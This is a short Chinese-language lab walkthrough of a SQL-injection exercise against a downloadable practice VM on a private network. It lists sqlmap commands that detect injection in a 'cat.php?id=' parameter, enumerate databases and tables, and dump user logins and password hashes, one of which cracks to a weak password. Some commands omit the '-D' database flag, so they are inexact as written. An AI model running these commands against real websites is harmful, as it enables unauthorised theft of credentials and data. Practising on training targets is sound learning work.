靶機環境
鏈接:https://pan.baidu.com/s/11_3AMv3AtgKLqprwR3IkWg 提取碼:5c7m
攻擊機 IP 192.168.124.149
靶機 IP 192.168.124.148
嘗試弱口令爆破……
使用web漏洞掃描工具
sqlmap -u "http://192.168.124.148/cat.php?id=3" #檢查是否存在sql注入
sqlmap -u "http://192.168.124.148/cat.php?id=3" --dbs #查看存在庫
sqlmap -u "http://192.168.124.148/cat.php?id=3" "photoblog" --tables #查看庫中的表
sqlmap -u "http://192.168.124.148/cat.php?id=3" "photoblog" -T "users" --columns #查看錶中字段
sqlmap -u "http://192.168.124.148/cat.php?id=3" "photoblog" -T "users" -C "login,password" --dump #查看字段的值
因爲密碼簡單 sqlmap 將MD5破解出來了括號裏就是 P4ssw0rd